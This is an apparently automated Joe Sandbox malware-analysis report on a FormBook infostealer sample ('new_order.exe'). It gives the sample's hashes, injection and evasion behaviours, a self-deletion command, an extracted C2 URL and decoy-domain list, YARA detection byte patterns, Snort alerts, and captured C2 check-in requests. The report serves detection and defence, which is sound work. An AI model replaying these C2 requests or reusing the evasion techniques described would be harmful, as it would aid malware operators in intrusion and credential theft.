Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new_order.exe

Overview

General Information

Sample Name:new_order.exe
Analysis ID:562020
MD5:a0e70d1760e60d81e0f4ac2904fa8002
SHA1:0512dcf545274ac6512abf3fb31a6fff41614280
SHA256:0cd606362bbe747f3d0c0193675ce46ea2920fba28580b784f50a2969bbb0c27
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • new_order.exe (PID: 1372 cmdline: "C:\Users\user\Desktop\new_order.exe" MD5: A0E70D1760E60D81E0F4AC2904FA8002)
    • new_order.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\new_order.exe" MD5: A0E70D1760E60D81E0F4AC2904FA8002)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6808 cmdline: /c del "C:\Users\user\Desktop\new_order.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.foodgw.com/os16/"], "decoy": ["nautic-experts-hageboelling.com", "fullharvestfundraising.com", "xbdsm.club", "duocaterers.com", "prizebuddy.club", "nillprive.com", "firebreathingpenguin.com", "buxledger.com", "annual-journals.com", "mydemosite0.com", "noaoka.com", "eblaghe-iran.xyz", "globalyuncang.com", "jacqueson-autocars.com", "asiafinances.com", "howtomakearesume.space", "modernwarfaresecrets.com", "dualamaquinaria.com", "thrili.com", "gracing-up.com", "jcrealtydesigns.com", "southaustinmarket.com", "dp-yszxwbhc.com", "cryptolux.store", "yourtechyadda.com", "yogamat-turban.com", "fykori.xyz", "bitherders.com", "strelingcollectibles.com", "undershieldz.com", "youcarboneutral.com", "meetjaykinder.com", "wicked-smokes.com", "wy-bride.com", "dunespro.com", "sallyandterry.com", "theamalfiswim.com", "eleynworld.com", "dreamsinbloomphotography.com", "anaccommodation.com", "slingactivt.com", "rxd-ereecd.com", "immovableproperty.online", "ramziflowers.com", "anthropophony.com", "uncle.finance", "ialife.info", "kennascookies.com", "meta-medical.info", "sexcommittee.com", "royalfountainlogistics.com", "thedefinitionteam.store", "dragonflyessence.com", "momubeauty.com", "alraedest.com", "alcmjd.xyz", "massagecon.com", "nicoletian.com", "rapslearning.online", "dlapi.xyz", "52economics.com", "neurochirurgie-eisner.com", "mbbfocean.xyz", "greenlightiim.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.new_order.exe.400000.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.new_order.exe.400000.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.new_order.exe.400000.5.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        3.0.new_order.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.new_order.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.foodgw.com/os16/"], "decoy": ["nautic-experts-hageboelling.com", "fullharvestfundraising.com", "xbdsm.club", "duocaterers.com", "prizebuddy.club", "nillprive.com", "firebreathingpenguin.com", "buxledger.com", "annual-journals.com", "mydemosite0.com", "noaoka.com", "eblaghe-iran.xyz", "globalyuncang.com", "jacqueson-autocars.com", "asiafinances.com", "howtomakearesume.space", "modernwarfaresecrets.com", "dualamaquinaria.com", "thrili.com", "gracing-up.com", "jcrealtydesigns.com", "southaustinmarket.com", "dp-yszxwbhc.com", "cryptolux.store", "yourtechyadda.com", "yogamat-turban.com", "fykori.xyz", "bitherders.com", "strelingcollectibles.com", "undershieldz.com", "youcarboneutral.com", "meetjaykinder.com", "wicked-smokes.com", "wy-bride.com", "dunespro.com", "sallyandterry.com", "theamalfiswim.com", "eleynworld.com", "dreamsinbloomphotography.com", "anaccommodation.com", "slingactivt.com", "rxd-ereecd.com", "immovableproperty.online", "ramziflowers.com", "anthropophony.com", "uncle.finance", "ialife.info", "kennascookies.com", "meta-medical.info", "sexcommittee.com", "royalfountainlogistics.com", "thedefinitionteam.store", "dragonflyessence.com", "momubeauty.com", "alraedest.com", "alcmjd.xyz", "massagecon.com", "nicoletian.com", "rapslearning.online", "dlapi.xyz", "52economics.com", "neurochirurgie-eisner.com", "mbbfocean.xyz", "greenlightiim.com"]}
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.foodgw.com/os16/Avira URL Cloud: Label: malware
          Source: http://www.bitherders.com/os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fjAvira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: new_order.exeJoe Sandbox ML: detected
          Source: 3.0.new_order.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.explorer.exe.4e0f840.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 3.0.new_order.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.new_order.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.new_order.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.new_order.exe.1acb0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: new_order.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: explorer.pdbUGP source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: new_order.exe, 00000001.00000003.684420646.000000001AE80000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000001.00000003.688778251.000000001ACF0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000003.689848535.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755436113.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947351653.00000000049FF000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947213320.00000000048E0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: new_order.exe, new_order.exe, 00000003.00000003.689848535.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755436113.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000009.00000002.947351653.00000000049FF000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947213320.00000000048E0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00402630 FindFirstFileA,

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49806 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49806 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49806 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49829 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49829 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49829 -> 3.64.163.50:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.royalfountainlogistics.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeDomain query: www.bitherders.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.foodgw.com/os16/
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj HTTP/1.1Host: www.royalfountainlogistics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj HTTP/1.1Host: www.bitherders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 09:35:12 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: new_order.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: new_order.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000009.00000002.947761745.00000000052FF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.bitherders.com
          Source: explorer.exe, 00000009.00000002.947761745.00000000052FF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.bitherders.com/
          Source: unknownDNS traffic detected: queries for: www.royalfountainlogistics.com
          Source: global trafficHTTP traffic detected: GET /os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj HTTP/1.1Host: www.royalfountainlogistics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj HTTP/1.1Host: www.bitherders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
